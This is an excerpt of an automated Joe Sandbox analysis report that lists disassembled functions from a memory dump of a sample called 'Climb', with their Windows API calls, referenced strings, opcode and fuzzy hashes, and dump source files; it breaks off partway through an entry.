                                                                                                                                                                          • Opcode Fuzzy Hash: 2b6fbee4a4d5bf519b8410a060817ce7eb9a05b3f3daaf8b9ee829015320344f
                                                                                                                                                                          • Instruction Fuzzy Hash: D4715BB2E04209ABDF11DFE5DC44FAEBBB9BF05340F154129E915A6191DB309A06CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AECF1D
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00AFDCD0,00000000,?,00000000,?,?), ref: 00AECFA4
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00AED004
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AED054
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AED0CF
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00AED112
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00AED221
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00AED2AD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00AED2E1
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00AED2EE
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00AED3C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                          • Opcode ID: e39a8d8e1fcbf64c7a35cefdc32fb46f75d3c8e467bd055c8612ef71488c65c7
                                                                                                                                                                          • Instruction ID: dceb95a85409532f7f6a2cb0a01c8f35e31c4af20bd6ea9e4305c0f9b9bd21f1
                                                                                                                                                                          • Opcode Fuzzy Hash: e39a8d8e1fcbf64c7a35cefdc32fb46f75d3c8e467bd055c8612ef71488c65c7
                                                                                                                                                                          • Instruction Fuzzy Hash: A3127A756042019FDB14DF15C981A2AB7F5FF88724F04899CF99A9B3A2CB35ED42CB81
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00AF1462
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF149D
                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF14F0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF1526
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF15A2
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF161D
                                                                                                                                                                            • Part of subcall function 00A7FD52: _wcslen.LIBCMT ref: 00A7FD5D
                                                                                                                                                                            • Part of subcall function 00AC3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AC3547
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                          • Opcode ID: 41b1aeb579435ed795c8bc510e74e0972f2745ddc6970af1f0f5b1902d450589
                                                                                                                                                                          • Instruction ID: 0af93af49f7b02b9d0e9a348174d03c590185eaa32636b4ca71ca0f9c4d083d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 41b1aeb579435ed795c8bc510e74e0972f2745ddc6970af1f0f5b1902d450589
                                                                                                                                                                          • Instruction Fuzzy Hash: DCE1AD72608305CFCB14EF64C65092AB7F2BF98354B14895CF99A9B3A2DB31ED45CB81
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                          • Opcode ID: 73d91ca372180364d30340e68809c0336be97061737bba7d15845b2beb92484e
                                                                                                                                                                          • Instruction ID: d29b64820a04c4378d0a748d459553e765b3da38cc88aec411701bc968694f49
                                                                                                                                                                          • Opcode Fuzzy Hash: 73d91ca372180364d30340e68809c0336be97061737bba7d15845b2beb92484e
                                                                                                                                                                          • Instruction Fuzzy Hash: 917118736105A68BCB109F7DCE405BF33A2AF70358F210125FC6A9B294EA35DD44C7A0
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF8DB5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF8DC9
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF8DEC
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AF8E0F
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AF8E4D
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AF6691), ref: 00AF8EA9
                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AF8EE2
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AF8F25
                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AF8F5C
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00AF8F68
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AF8F78
                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,00AF6691), ref: 00AF8F87
                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AF8FA4
                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AF8FB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                          • Opcode ID: e4a9b644668fcf62855ca11b50f70b83f257cbf8e5570fd05f745fd40268ace9
                                                                                                                                                                          • Instruction ID: 184a84385582291db71fdd79e8c6ab29db9429bf1910c9a2c3caa5890b02824f
                                                                                                                                                                          • Opcode Fuzzy Hash: e4a9b644668fcf62855ca11b50f70b83f257cbf8e5570fd05f745fd40268ace9
                                                                                                                                                                          • Instruction Fuzzy Hash: 2661BFB1900619BEEB14DFA4CC45BBE7BB9BF08B10F108506FA15D61D1DB79A990CBA0
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00AD493D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD4948
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD499F
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD49DD
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 00AD4A1B
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD4A63
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD4A9E
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00AD4ACC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                          • Opcode ID: 4d708b76975f137eb7c0f0d40d4efa6e0ac84831e78eb13760eba107060cb8a0
                                                                                                                                                                          • Instruction ID: ab4f23677ad42e949cdad655c379864ee2718e39c98d8356e9567333c5bdcaf5
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d708b76975f137eb7c0f0d40d4efa6e0ac84831e78eb13760eba107060cb8a0
                                                                                                                                                                          • Instruction Fuzzy Hash: DD71BE725082118FC710EF38C99096AB7F8EFA8768F10492EF89697361EB31DD45CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 00AC6395
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AC63A7
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00AC63BE
                                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 00AC63D3
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00AC63D9
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00AC63E9
                                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 00AC63EF
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AC6410
                                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AC642A
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 00AC6433
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AC649A
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 00AC64D6
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00AC64DC
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00AC64E3
                                                                                                                                                                          • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00AC653A
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00AC6547
                                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,?), ref: 00AC656C
                                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AC6596
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 895679908-0
                                                                                                                                                                          • Opcode ID: 4428a245b97f1ac0cdd77590389bb8ece1f1aee2b638137d0071ef55f00f4d2e
                                                                                                                                                                          • Instruction ID: 306604055912a669545622f27c4902dccff9c640942e50c1bfa1d0c8a487c6e8
                                                                                                                                                                          • Opcode Fuzzy Hash: 4428a245b97f1ac0cdd77590389bb8ece1f1aee2b638137d0071ef55f00f4d2e
                                                                                                                                                                          • Instruction Fuzzy Hash: 4C718A31900609AFDB21DFA8CE85FAEBBF6FF48704F11091CE186A66A0D775E941CB50
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 00AE0884
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 00AE088F
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00AE089A
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00AE08A5
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 00AE08B0
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00AE08BB
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00AE08C6
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 00AE08D1
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00AE08DC
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00AE08E7
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 00AE08F2
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 00AE08FD
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00AE0908
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00AE0913
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 00AE091E
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00AE0929
                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 00AE0939
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00AE097B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3215588206-0
                                                                                                                                                                          • Opcode ID: 98bfe0295b42eb05bd51102d8d90508e85c49bb5776d57840a87b20a9927c312
                                                                                                                                                                          • Instruction ID: 1b82c664db49fe2c4a558caefa2165d4c2d824a6b6b64873eb097ae010e75b67
                                                                                                                                                                          • Opcode Fuzzy Hash: 98bfe0295b42eb05bd51102d8d90508e85c49bb5776d57840a87b20a9927c312
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F415470D083596ADB10DFBA8C85C6EBFE8FF04754B50452AE11CEB282DB789841CF91
                                                                                                                                                                          APIs
                                                                                                                                                                          • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A80436
                                                                                                                                                                            • Part of subcall function 00A8045D: InitializeCriticalSectionAndSpinCount.KERNEL32(00B3170C,00000FA0,F589D44D,?,?,?,?,00AA2733,000000FF), ref: 00A8048C
                                                                                                                                                                            • Part of subcall function 00A8045D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00AA2733,000000FF), ref: 00A80497
                                                                                                                                                                            • Part of subcall function 00A8045D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00AA2733,000000FF), ref: 00A804A8
                                                                                                                                                                            • Part of subcall function 00A8045D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A804BE
                                                                                                                                                                            • Part of subcall function 00A8045D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A804CC
                                                                                                                                                                            • Part of subcall function 00A8045D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A804DA
                                                                                                                                                                            • Part of subcall function 00A8045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A80505
                                                                                                                                                                            • Part of subcall function 00A8045D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A80510
                                                                                                                                                                          • ___scrt_fastfail.LIBCMT ref: 00A80457
                                                                                                                                                                            • Part of subcall function 00A80413: __onexit.LIBCMT ref: 00A80419
                                                                                                                                                                          Strings
                                                                                                                                                                          • SleepConditionVariableCS, xrefs: 00A804C4
                                                                                                                                                                          • InitializeConditionVariable, xrefs: 00A804B8
                                                                                                                                                                          • WakeAllConditionVariable, xrefs: 00A804D2
                                                                                                                                                                          • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A80492
                                                                                                                                                                          • kernel32.dll, xrefs: 00A804A3
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                          • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                          • API String ID: 66158676-1714406822
                                                                                                                                                                          • Opcode ID: e91182b25fce978fbc0cdfdd3a8d881ad170247cc6453d980f164fcfb2c6823f
                                                                                                                                                                          • Instruction ID: 07eada30c690cdbd6a4eb562af784acdc21b0d8883353e418e6bab141834ad5d
                                                                                                                                                                          • Opcode Fuzzy Hash: e91182b25fce978fbc0cdfdd3a8d881ad170247cc6453d980f164fcfb2c6823f
                                                                                                                                                                          • Instruction Fuzzy Hash: 12213872A80705ABD7617BE8AC0AF6A37D9EB05B61F140625F901D72D0DF708C05CB64
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen
                                                                                                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                                                          • API String ID: 176396367-1603158881
                                                                                                                                                                          • Opcode ID: 9c743bf8b03e13cea730336b4beb0b8dbd9cce8870ffba741f0ae171d3710ec3
                                                                                                                                                                          • Instruction ID: b60eb178a04debead6e762054b55e36042d5d252608bd6caebc01c5c0c9f1801
                                                                                                                                                                          • Opcode Fuzzy Hash: 9c743bf8b03e13cea730336b4beb0b8dbd9cce8870ffba741f0ae171d3710ec3
                                                                                                                                                                          • Instruction Fuzzy Hash: 54E1D033A04516ABCF189FB8C941BEDBBB5BF14710F12C16DE456E7250EB30AE998790
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(00000000,00000000,00AFDCD0), ref: 00AD4F6C
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD4F80
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD4FDE
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD5039
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD5084
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AD50EC
                                                                                                                                                                            • Part of subcall function 00A7FD52: _wcslen.LIBCMT ref: 00A7FD5D
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?,00B27C10,00000061), ref: 00AD5188
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                          • Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_14_2_a60000_Climb.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                          • API String ID: 2055661098-1000479233
                                                                                                                                                                          • Opcode ID: 4114eb5841c624ce5889ebf2863f9ea8c32edf9313c827b087cc1fcc5a8fc4c4
                                                                                                                                                                          • Instruction ID: 205df0337f5c7dd87b1586d0c5c44aa47f99d1e33edd042caebea822535f342c
                                                                                                                                                                          • Opcode Fuzzy Hash: 4114eb5841c624ce5889ebf2863f9ea8c32edf9313c827b087cc1fcc5a8fc4c4
                                                                                                                                                                          • Instruction Fuzzy Hash: A6B1A231A087029FC714EF38C991A6AB7E5BFA8724F504A1EF596C7391DB30D845CB92
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AEBBF8
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC10
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC34
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AEBC60
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC74
                                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00AEBC96
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AEBD92
                                                                                                                                                                            • Part of subcall function 00AD0F4E: GetStdHandle.KERNEL32(000000F6), ref: 00AD0F6D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AEBDAB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00AEBDC6
                                                                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AEBE16
                                                                                                                                                                          • GetLastError.KERNEL32(00000000), ref: 00AEBE67
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AEBE99
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AEBEAA
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AEBEBC
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00AEBECE
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00AEBF43
                                                                                                                                                                          Memory Dump Source
